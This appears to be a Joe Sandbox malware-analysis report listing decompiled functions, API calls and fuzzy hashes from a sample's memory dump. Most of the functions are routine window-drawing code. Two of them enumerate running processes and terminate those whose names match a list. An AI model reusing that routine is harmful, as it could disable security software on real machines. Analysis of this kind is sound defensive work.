0x00cecaa1
0x00cecaa6
0x00cecaab
0x00cecaad
0x00cecaad
0x00cecab8
0x00cecab8
0x00cecb3c

APIs

FillRect.USER32 ref: 00CECAB8
GetParent.USER32(?), ref: 00CECACF
GetClientRect.USER32(?,?), ref: 00CECAE2
GetParent.USER32(?), ref: 00CECAEB
MapWindowPoints.USER32 ref: 00CECB03

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ParentRect$ClientFillPointsWindow
String ID:
API String ID: 3058756167-0
Opcode ID: b17171f0988f3dad3a5b1d8162424ad9ec332bb47d2867b0ab06eabcf1e69e83
Instruction ID: 4e1c9ff26161961f7b7c97c04f06085189cedfc3ddb94bc07dc2865d0b5ba5a6
Opcode Fuzzy Hash: b17171f0988f3dad3a5b1d8162424ad9ec332bb47d2867b0ab06eabcf1e69e83
Instruction Fuzzy Hash: FA214C72910119EFCB04EFA5CD49CAEBBB9FF09700B00815AF945A7221DB71AA04DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7297 Relevance: 7.6, APIs: 5, Instructions: 62
processCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CA7297(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v16;
				char _v280;
				long _v308;
				void* _v312;
				void* _v316;
				intOrPtr _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				int _t15;
				intOrPtr* _t16;
				int _t17;
				void* _t23;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				void* _t37;
				signed int _t38;

				_t40 = (_t38 & 0xfffffff8) - 0x134;
				_t11 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t11 ^ (_t38 & 0xfffffff8) - 0x00000134;
				_t36 = __ecx;
				_v308 = 0x128;
				_v312 = __ecx;
				_t23 = CreateToolhelp32Snapshot(2, 0);
				_t15 = Process32First(_t23,  &_v312);
				while(_t15 != 0) {
					_t33 = 0x15;
					do {
						_t16 = _t36;
						if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
							_t16 =  *_t36;
						}
						_t17 = E00DF46B4(_t33, _t36, _t16,  &_v280);
						if(_t17 == 0) {
							TerminateProcess(OpenProcess(1, _t17, _v308), 0);
						}
						_t36 = _t36 + 0x18;
						_t33 = _t33 - 1;
					} while (_t33 != 0);
					_t15 = Process32Next(_t23,  &_v316);
					_t36 = _v324;
				}
				_pop(_t34);
				_pop(_t37);
				_pop(_t24);
				return E00DDCBCE(_t15, _t24, _v16 ^ _t40, _t31, _t34, _t37);
			}

0x00ca729d
0x00ca72a3
0x00ca72aa
0x00ca72b6
0x00ca72b8
0x00ca72c2
0x00ca72cc
0x00ca72d4
0x00ca7328
0x00ca72de
0x00ca72df
0x00ca72e3
0x00ca72e5
0x00ca72e7
0x00ca72e7
0x00ca72ef
0x00ca72f8
0x00ca730a
0x00ca730a
0x00ca7310
0x00ca7313
0x00ca7313
0x00ca731e
0x00ca7324
0x00ca7324
0x00ca7333
0x00ca7334
0x00ca7335
0x00ca7340

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002), ref: 00CA72C6
Process32First.KERNEL32(00000000,00000000), ref: 00CA72D4
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA7301
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CA730A
Process32Next.KERNEL32 ref: 00CA731E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2688562911-0
Opcode ID: 2d3f607771f8bade0bdadfab40fb46c1840709a54948e50a39cb1daeee491c93
Instruction ID: fdeec4d7a48ac10e502b21a98a84bab3af81c0f5bfdfeaaf0177323095811f4a
Opcode Fuzzy Hash: 2d3f607771f8bade0bdadfab40fb46c1840709a54948e50a39cb1daeee491c93
Instruction Fuzzy Hash: 5711A3722083019FD7209F65ED09BAB7BFCFB85B15F000A1EF99597191DB70A908C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CF8B0D Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CF8B0D(struct HRGN__* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, intOrPtr __esi, void* __eflags) {
				void* _t48;
				intOrPtr* _t50;
				void* _t52;

				_t51 = __esi;
				_t48 = __edx;
				_t39 = __ebx;
				_push(0x1c);
				E00DDD55F(0xe0ba32, __ebx, __edi, __esi);
				_t50 = __ecx;
				if(__ecx != 0 &&  *(__ecx + 0x20) != 0) {
					_t39 = 0;
					if( *((intOrPtr*)(__ecx + 0xbd8)) == 0) {
						L5:
						SetWindowRgn( *(_t50 + 0x20), _t39, _t39);
					} else {
						_t51 =  *((intOrPtr*)( *__ecx + 0x1a0));
						 *0xe17a64();
						if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x1a0))))() == 0) {
							goto L5;
						} else {
							 *(_t52 - 0x20) = 0;
							 *((intOrPtr*)(_t52 - 0x1c)) = 0;
							 *((intOrPtr*)(_t52 - 0x18)) = 0;
							 *((intOrPtr*)(_t52 - 0x14)) = 0;
							GetWindowRect( *(__ecx + 0x20), _t52 - 0x20);
							_t51 = 0xe1a644;
							 *(_t52 - 0x24) = 0;
							 *((intOrPtr*)(_t52 - 0x28)) = 0xe1a644;
							 *((intOrPtr*)(_t52 - 4)) = 0;
							E00CB9BC6(0, _t52 - 0x28, _t50, CreateRoundRectRgn(0, 0,  *((intOrPtr*)(_t52 - 0x18)) -  *(_t52 - 0x20) + 1,  *((intOrPtr*)(_t52 - 0x14)) -  *((intOrPtr*)(_t52 - 0x1c)) + 1, 4, 4));
							SetWindowRgn( *(_t50 + 0x20),  *(_t52 - 0x24), 0);
							 *((intOrPtr*)(_t52 - 0x28)) = 0xe1a644;
							E00CB91F0(_t52 - 0x28, _t48);
						}
					}
				}
				return E00DDD50E(_t39, _t50, _t51);
			}

0x00cf8b0d
0x00cf8b0d
0x00cf8b0d
0x00cf8b0d
0x00cf8b14
0x00cf8b19
0x00cf8b1d
0x00cf8b2d
0x00cf8b35
0x00cf8bb5
0x00cf8bba
0x00cf8b37
0x00cf8b39
0x00cf8b41
0x00cf8b4d
0x00000000
0x00cf8b4f
0x00cf8b52
0x00cf8b59
0x00cf8b5c
0x00cf8b5f
0x00cf8b62
0x00cf8b68
0x00cf8b6d
0x00cf8b70
0x00cf8b86
0x00cf8b96
0x00cf8ba2
0x00cf8bab
0x00cf8bae
0x00cf8bae
0x00cf8b4d
0x00cf8b35
0x00cf8bc5

APIs

__EH_prolog3_GS.LIBCMT ref: 00CF8B14
GetWindowRect.USER32 ref: 00CF8B62
CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 00CF8B8C
SetWindowRgn.USER32(00000000,?,00000000), ref: 00CF8BA2
SetWindowRgn.USER32(00000000,00000000,00000000), ref: 00CF8BBA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_Round
String ID:
API String ID: 2502471913-0
Opcode ID: 8ef5ce68e1023d9286e98a52777891b481e218f6f8ab438baab544b679531c3c
Instruction ID: 8a06f0a79a3cb1c9aaee5fe098c8891a15ec9d14bad32471d0986602d674542f
Opcode Fuzzy Hash: 8ef5ce68e1023d9286e98a52777891b481e218f6f8ab438baab544b679531c3c
Instruction Fuzzy Hash: 36211AB590020AAFDF05DFA4CC85AFDBBB9FF08704F14106AE645B2251CB349E45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1571 Relevance: 7.6, APIs: 5, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00CD1571(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr __esi, void* __eflags) {
				struct HWND__* _t25;
				intOrPtr* _t31;
				intOrPtr* _t41;
				void* _t54;

				_t53 = __esi;
				_push(0x18);
				E00DDD55F(0xe09ded, __ebx, __edi, __esi);
				_t41 = __ecx;
				 *((intOrPtr*)(__ecx + 0xe8)) =  *((intOrPtr*)(_t54 + 8));
				E00CAEE52(__ecx + 8,  *((intOrPtr*)(_t54 + 8)));
				_t25 =  *(__ecx + 0xc4);
				if(_t25 != 0) {
					_t25 =  *(_t25 + 0x20);
				}
				if(IsWindow(_t25) != 0) {
					_t53 = _t41 + 0x30;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect(_t54 - 0x20, 0, 0xffffffff);
					InvalidateRect( *( *((intOrPtr*)(_t41 + 0xc4)) + 0x20), _t54 - 0x20, 1);
					UpdateWindow( *( *((intOrPtr*)(_t41 + 0xc4)) + 0x20));
				}
				_t51 =  *((intOrPtr*)(_t41 + 0xb8));
				if( *((intOrPtr*)(_t41 + 0xb8)) != 0) {
					_t53 =  *((intOrPtr*)( *_t41 + 0x24));
					 *0xe17a64(_t54 - 0x24);
					_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t41 + 0x24))))();
					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
					E00CA2975(E00CB7AE0(_t51,  *_t31),  *((intOrPtr*)(_t54 - 0x24)) - 0x10);
				}
				return E00DDD50E(_t41, _t51, _t53);
			}

0x00cd1571
0x00cd1571
0x00cd1578
0x00cd157d
0x00cd1586
0x00cd158c
0x00cd1591
0x00cd1599
0x00cd159b
0x00cd159b
0x00cd15a7
0x00cd15a9
0x00cd15af
0x00cd15b8
0x00cd15b9
0x00cd15ba
0x00cd15bb
0x00cd15d0
0x00cd15df
0x00cd15df
0x00cd15e5
0x00cd15ed
0x00cd15f1
0x00cd15fa
0x00cd1602
0x00cd1606
0x00cd1617
0x00cd1617
0x00cd1621

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD1578
IsWindow.USER32(?), ref: 00CD159F
InflateRect.USER32(?,00000000,000000FF), ref: 00CD15BB
InvalidateRect.USER32(?,?,00000001), ref: 00CD15D0
UpdateWindow.USER32(?), ref: 00CD15DF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
String ID:
API String ID: 2146894351-0
Opcode ID: e07112c91123786366a714fe4955909e3534ff8d8059d2a15e228c05ac79216b
Instruction ID: bbfd02dca38d294cabcf06bceec443e95b6d8efb31cffade1b4e16425061bcde
Opcode Fuzzy Hash: e07112c91123786366a714fe4955909e3534ff8d8059d2a15e228c05ac79216b
Instruction Fuzzy Hash: B51129316041159FCF01DFA4C984FA937B6FF49700F1841A9E919AF2A6DB31EA08CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CED5EB Relevance: 7.6, APIs: 5, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00CED5EB(void* __ecx, intOrPtr _a4, struct tagRECT _a12, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				struct HBRUSH__* _t15;
				int _t17;
				intOrPtr _t19;
				struct HDC__* _t22;
				void* _t25;
				intOrPtr _t28;

				_push(__ecx);
				_t19 = _a28;
				_t28 = _a4;
				_t25 = __ecx;
				_v8 = _a32;
				if( *((intOrPtr*)(__ecx + 0x44)) == 0) {
					_t15 = GetSysColorBrush(0x18);
					if(_t28 != 0) {
						_t22 =  *(_t28 + 4);
					} else {
						_t22 = 0;
					}
					_t17 = FillRect(_t22,  &_a12, _t15);
				} else {
					if(_t28 != 0) {
						_t17 =  *(_t28 + 4);
					} else {
						_t17 = 0;
					}
					__imp__DrawThemeBackground( *((intOrPtr*)(_t25 + 0x44)), _t17, 1, 0,  &_a12, 0);
					__imp__GetThemeColor( *((intOrPtr*)(_t25 + 0x44)), 1, 0, 0xedb, _t19);
					__imp__GetThemeColor( *((intOrPtr*)(_t25 + 0x44)), 1, 0, 0xedf, _v8);
				}
				return _t17;
			}

0x00ced5ee
0x00ced5f3
0x00ced5f7
0x00ced5fb
0x00ced5fd
0x00ced604
0x00ced651
0x00ced659
0x00ced65f
0x00ced65b
0x00ced65b
0x00ced65b
0x00ced668
0x00ced606
0x00ced608
0x00ced60e
0x00ced60a
0x00ced60a
0x00ced60a
0x00ced61f
0x00ced632
0x00ced647
0x00ced647
0x00ced672

APIs

DrawThemeBackground.UXTHEME(00000000,?,00000001,00000000,?,00000000), ref: 00CED61F
GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDB,?), ref: 00CED632
GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EDF,?), ref: 00CED647
GetSysColorBrush.USER32(00000018), ref: 00CED651
FillRect.USER32 ref: 00CED668

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ColorTheme$BackgroundBrushDrawFillRect
String ID:
API String ID: 3021913306-0
Opcode ID: 001e97c72923e93074aa4b0ec4b53e116deddc548c02fc404375bced900c072e
Instruction ID: fdda5856723e4e0af80928c9e73272b2a4d14c14178a37e8e8b6ce2a008abb72
Opcode Fuzzy Hash: 001e97c72923e93074aa4b0ec4b53e116deddc548c02fc404375bced900c072e
Instruction Fuzzy Hash: 48117C32255254FFDB208F5ACD45FAA776DBB48B00F014819BA1AA6090DBB1A914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA71F7 Relevance: 7.6, APIs: 5, Instructions: 54
processCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CA71F7(void* __ebx, void* __edx, void* __edi, char _a4, void* _a24) {
				signed int _v8;
				char _v272;
				long _v300;
				void* _v308;
				void* __esi;
				signed int _t12;
				int _t16;
				void* _t26;
				void* _t33;
				void* _t34;
				void* _t35;
				long _t37;
				signed int _t38;

				_t34 = __edi;
				_t33 = __edx;
				_t26 = __ebx;
				_t12 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t12 ^ _t38;
				_v308 = 0x128;
				_t35 = CreateToolhelp32Snapshot(2, 0);
				_t16 = Process32First(_t35,  &_v308);
				while(_t16 != 0) {
					_t18 =  >=  ? _a4 :  &_a4;
					if(E00DF46B4(_t34, _t35,  >=  ? _a4 :  &_a4,  &_v272) == 0) {
						_t37 = 1;
						TerminateProcess(OpenProcess(1, 0, _v300), 0);
					} else {
						_t16 = Process32Next(_t35,  &_v308);
						continue;
					}
					L5:
					E00CA44CB( &_a4);
					return E00DDCBCE(_t37, _t26, _v8 ^ _t38, _t33, _t34, _t37);
				}
				_t37 = 0;
				goto L5;
			}

0x00ca71f7
0x00ca71f7
0x00ca71f7
0x00ca7200
0x00ca7207
0x00ca720f
0x00ca721f
0x00ca7229
0x00ca725d
0x00ca723e
0x00ca724d
0x00ca7284
0x00ca728f
0x00ca724f
0x00ca7257
0x00000000
0x00ca7257
0x00ca7263
0x00ca7266
0x00ca7279
0x00ca7279
0x00ca7261
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CA7219
Process32First.KERNEL32(00000000,00000128), ref: 00CA7229
Process32Next.KERNEL32 ref: 00CA7257
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CA7286
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CA728F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2688562911-0
Opcode ID: bdb4fb4c365b08702839f320afa585fcb1fd62903ca889d5de3eb605a71385a5
Instruction ID: 67c6bd16513d408f83a450f61c7a82f4d5693fb79a8ee0a4f7b7d7ba5787f584
Opcode Fuzzy Hash: bdb4fb4c365b08702839f320afa585fcb1fd62903ca889d5de3eb605a71385a5
Instruction Fuzzy Hash: 7B118E71604119EFDB20DF66DC49BEE7BBCFB09744F004255F806A6180DB74AB48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6917 Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00CD6917(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t12;
				struct HWND__* _t15;
				int _t16;
				void* _t32;
				void* _t33;
				signed int _t35;

				_t32 = __edx;
				_t25 = __ebx;
				_t12 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t12 ^ _t35;
				_t34 = _a4;
				_t33 = __ecx;
				E00CB236A(__ebx, __ecx, __eflags);
				if(_t34 != 0) {
					GetObjectA( *(_t34 + 4), 0x3c,  &_v68);
					_t34 = _t33 + 0x104;
					E00CB9CCD(_t33 + 0x104);
					E00CB9BC6(__ebx, _t33 + 0x104, _t33, CreateFontIndirectA( &_v68));
				}
				if(_t33 != 0) {
					_t15 =  *(_t33 + 0x20);
				} else {
					_t15 = 0;
				}
				_t16 = IsWindow(_t15);
				_t39 = _t16;
				if(_t16 != 0) {
					_t16 = E00CD5755(_t25, _t33, _t32, _t33, _t34, _t39);
					if(_a8 != 0) {
						InvalidateRect( *(_t33 + 0x20), 0, 1);
						_t16 = UpdateWindow( *(_t33 + 0x20));
					}
				}
				return E00DDCBCE(_t16, _t25, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00cd6917
0x00cd6917
0x00cd691d
0x00cd6924
0x00cd6928
0x00cd692c
0x00cd692e
0x00cd6935
0x00cd6940
0x00cd6946
0x00cd694e
0x00cd6960
0x00cd6960
0x00cd6967
0x00cd696d
0x00cd6969
0x00cd6969
0x00cd6969
0x00cd6971
0x00cd6977
0x00cd6979
0x00cd697d
0x00cd6986
0x00cd698f
0x00cd6998
0x00cd6998
0x00cd6986
0x00cd69ab

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00CD6940
CreateFontIndirectA.GDI32(?), ref: 00CD6957
IsWindow.USER32(?), ref: 00CD6971
InvalidateRect.USER32(?,00000000,00000001), ref: 00CD698F
UpdateWindow.USER32(?), ref: 00CD6998

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$CreateFontIndirectInvalidateObjectRectUpdate
String ID:
API String ID: 1602852816-0
Opcode ID: b8b11f35dde9a3b23410c492d31de73a69d8718814e4f1f5af23341914d6be59
Instruction ID: dfd1d68603ca5057be0274baa0a8cfa6593b47e46d2b7c467b7fd0d5c6a23222
Opcode Fuzzy Hash: b8b11f35dde9a3b23410c492d31de73a69d8718814e4f1f5af23341914d6be59
Instruction Fuzzy Hash: 1B118E32600604EFCB15AF75DD05AAEB7B9BF08B00F00441AFA52A32A0DB74EE14DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CC68C9 Relevance: 7.6, APIs: 5, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00CC68C9(void* __ecx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagPOINT _v32;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t21;
				void* _t33;
				void* _t38;
				void* _t40;
				signed int _t41;

				_t19 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t19 ^ _t41;
				_t40 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x794)) == 0) {
					L3:
					_t21 = E00CB236A(_t33, _t40, __eflags);
				} else {
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetClientRect( *(__ecx + 0x20),  &_v24);
					_v32.x = 0;
					_v32.y = 0;
					GetCursorPos( &_v32);
					ScreenToClient( *(_t40 + 0x20),  &_v32);
					_push(_v32.y);
					if(PtInRect( &_v24, _v32) == 0) {
						goto L3;
					} else {
						SetCursor( *(_t40 + 0x794));
						_t21 = 1;
					}
				}
				return E00DDCBCE(_t21, _t33, _v8 ^ _t41, _t38, 0, _t40);
			}

0x00cc68cf
0x00cc68d6
0x00cc68da
0x00cc68e5
0x00cc6942
0x00cc6944
0x00cc68e7
0x00cc68ea
0x00cc68f1
0x00cc68f4
0x00cc68f7
0x00cc68fa
0x00cc6903
0x00cc6907
0x00cc690a
0x00cc6917
0x00cc691d
0x00cc692f
0x00000000
0x00cc6931
0x00cc6937
0x00cc693f
0x00cc693f
0x00cc692f
0x00cc6956

APIs

GetClientRect.USER32(?,?), ref: 00CC68FA
GetCursorPos.USER32(?), ref: 00CC690A
ScreenToClient.USER32 ref: 00CC6917
PtInRect.USER32(?,?,?), ref: 00CC6927
SetCursor.USER32(?), ref: 00CC6937

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClientCursorRect$Screen
String ID:
API String ID: 1023402310-0
Opcode ID: 96a9ffb0b191b6769a9629e60cdd5c4d1387cc4f4d28cc375a6bfbf7a5faa66c
Instruction ID: b3ec3058cd038258073f6aad48c3890da525d3a8c9b43a13db4b7cc3db9342b8
Opcode Fuzzy Hash: 96a9ffb0b191b6769a9629e60cdd5c4d1387cc4f4d28cc375a6bfbf7a5faa66c
Instruction Fuzzy Hash: 2D111871D0460ADFCB119FA6D905DFFBBF9FF54700B00406AE456A2220DB349A06DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00CC91CF Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00CC91CF(void* __ecx, struct tagPOINT _a8, intOrPtr _a12) {
				void* __ebp;
				int _t20;
				void* _t22;
				void* _t26;

				_t26 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x8c)) == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x88));
					if(__eflags != 0) {
						_push(_a12);
						__eflags = PtInRect(__ecx + 0x94, _a8.x);
						if(__eflags == 0) {
							 *((intOrPtr*)(_t26 + 0x88)) = 0;
							ReleaseCapture();
							RedrawWindow( *(_t26 + 0x20), 0, 0, 0x401);
						}
					}
					return E00CB236A(_t22, _t26, __eflags);
				}
				_push(_a12);
				_t20 = PtInRect(__ecx + 0x94, _a8);
				if(_t20 ==  *(_t26 + 0x84)) {
					return _t20;
				}
				 *(_t26 + 0x84) = _t20;
				return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x401);
			}

0x00cc91d3
0x00cc91de
0x00cc9213
0x00cc9219
0x00cc921b
0x00cc922e
0x00cc9230
0x00cc9232
0x00cc9238
0x00cc9248
0x00cc9248
0x00cc9230
0x00000000
0x00cc9250
0x00cc91e0
0x00cc91ed
0x00cc91f9
0x00cc9258
0x00cc9258
0x00cc9205
0x00000000

APIs

PtInRect.USER32(?,?,?), ref: 00CC91ED
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00CC920B
PtInRect.USER32(?,?,?), ref: 00CC9228
ReleaseCapture.USER32 ref: 00CC9238
RedrawWindow.USER32(?,00000000,00000000,00000401), ref: 00CC9248

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

